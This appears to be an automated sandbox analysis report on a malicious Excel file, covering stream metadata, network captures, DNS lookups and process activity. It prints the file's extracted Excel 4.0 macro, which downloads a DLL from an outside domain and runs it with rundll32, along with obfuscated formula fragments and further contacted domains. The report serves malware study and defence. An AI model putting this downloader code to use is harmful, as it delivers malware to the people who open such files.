                                                                                                        Base64 Encoded:False
                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                        Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752
                                                                                                        General
                                                                                                        Stream Path:Book
                                                                                                        File Type:Applesoft BASIC program data, first line number 8
                                                                                                        Stream Size:145752
                                                                                                        Entropy:3.94377585798
                                                                                                        Base64 Encoded:True
                                                                                                        Data ASCII:. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
                                                                                                        Data Raw:09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                        Macro 4.0 Code

                                                                                                        CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
                                                                                                        CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)
                                                                                                        
                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 27, 2021 04:10:08.934823990 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:08.955751896 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:08.955820084 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:08.966867924 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:08.987786055 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:08.991009951 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:08.991039991 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:08.991127968 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:08.991194010 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.007441044 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.028314114 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.028361082 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.028420925 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.258133888 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.278976917 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411086082 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411144018 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411187887 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411202908 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411211967 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411237001 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411263943 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411279917 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411298037 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411341906 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411355019 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411393881 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411396027 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411433935 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411518097 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411556005 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411560059 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411602020 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411681890 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411725998 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411737919 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411773920 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.411777973 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.411817074 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.412297010 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.412345886 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.412353039 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.412393093 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.412405968 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.412447929 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.412451029 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.412498951 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.425246000 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.430470943 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.430490017 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.430562019 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.459711075 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.459739923 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.459760904 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.459789038 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.459806919 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.459825039 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.459867954 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.459875107 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.459878922 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.460258007 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.460288048 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.460311890 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.460313082 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.460328102 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.460331917 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.460350037 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.460369110 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.460994005 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.461015940 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.461038113 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.461060047 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.461061954 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.461081982 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.461086988 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.461101055 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.461541891 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.461982965 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.462007046 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.462028980 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.462038994 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.462049961 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.462055922 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.462073088 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.462088108 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.462950945 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.462974072 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.462996006 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.463002920 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.463017941 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.463021994 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.463068008 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.463079929 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.463937044 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.463957071 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.463990927 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.466783047 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.466799974 CET49165443192.168.2.22172.67.150.228
                                                                                                        Jan 27, 2021 04:10:09.482501984 CET44349165172.67.150.228192.168.2.22
                                                                                                        Jan 27, 2021 04:10:09.482558966 CET44349165172.67.150.228192.168.2.22

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 27, 2021 04:10:08.897417068 CET5219753192.168.2.228.8.8.8
                                                                                                        Jan 27, 2021 04:10:08.919688940 CET53521978.8.8.8192.168.2.22
                                                                                                        Jan 27, 2021 04:10:40.906521082 CET5309953192.168.2.228.8.8.8
                                                                                                        Jan 27, 2021 04:10:40.924259901 CET53530998.8.8.8192.168.2.22
                                                                                                        Jan 27, 2021 04:10:41.914196968 CET5283853192.168.2.228.8.8.8
                                                                                                        Jan 27, 2021 04:10:41.932769060 CET53528388.8.8.8192.168.2.22
                                                                                                        Jan 27, 2021 04:10:42.504456043 CET6120053192.168.2.228.8.8.8
                                                                                                        Jan 27, 2021 04:10:42.579010963 CET53612008.8.8.8192.168.2.22

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                        Jan 27, 2021 04:10:08.897417068 CET192.168.2.228.8.8.80x312aStandard query (0)rnollg.comA (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:40.906521082 CET192.168.2.228.8.8.80x9f05Standard query (0)gadgetswolf.comA (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:41.914196968 CET192.168.2.228.8.8.80x6f73Standard query (0)homesoapmolds.comA (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:42.504456043 CET192.168.2.228.8.8.80x226Standard query (0)govemedico.tkA (IP address)IN (0x0001)

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Jan 27, 2021 04:10:08.919688940 CET8.8.8.8192.168.2.220x312aNo error (0)rnollg.com172.67.150.228A (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:08.919688940 CET8.8.8.8192.168.2.220x312aNo error (0)rnollg.com104.21.11.254A (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:40.924259901 CET8.8.8.8192.168.2.220x9f05No error (0)gadgetswolf.com172.67.200.147A (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:40.924259901 CET8.8.8.8192.168.2.220x9f05No error (0)gadgetswolf.com104.21.44.135A (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:41.932769060 CET8.8.8.8192.168.2.220x6f73No error (0)homesoapmolds.com172.67.198.109A (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:41.932769060 CET8.8.8.8192.168.2.220x6f73No error (0)homesoapmolds.com104.21.60.169A (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:42.579010963 CET8.8.8.8192.168.2.220x226No error (0)govemedico.tk172.67.158.184A (IP address)IN (0x0001)
                                                                                                        Jan 27, 2021 04:10:42.579010963 CET8.8.8.8192.168.2.220x226No error (0)govemedico.tk104.21.73.69A (IP address)IN (0x0001)

                                                                                                        HTTPS Packets

                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                        Jan 27, 2021 04:10:08.991039991 CET172.67.150.228443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                        Jan 27, 2021 04:10:41.022901058 CET172.67.200.147443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                        Jan 27, 2021 04:10:41.982295036 CET172.67.198.109443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                        Jan 27, 2021 04:10:42.639033079 CET172.67.158.184443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Start time:04:09:38
                                                                                                        Start date:27/01/2021
                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                        Imagebase:0x13f0b0000
                                                                                                        File size:27641504 bytes
                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:04:09:44
                                                                                                        Start date:27/01/2021
                                                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                                                                        Imagebase:0xff1c0000
                                                                                                        File size:45568 bytes
                                                                                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate

                                                                                                        General

                                                                                                        Start time:04:09:44
                                                                                                        Start date:27/01/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                                                                        Imagebase:0xb20000
                                                                                                        File size:44544 bytes
                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate

                                                                                                        General

                                                                                                        Start time:04:10:11
                                                                                                        Start date:27/01/2021
                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:msiexec.exe
                                                                                                        Imagebase:0x520000
                                                                                                        File size:73216 bytes
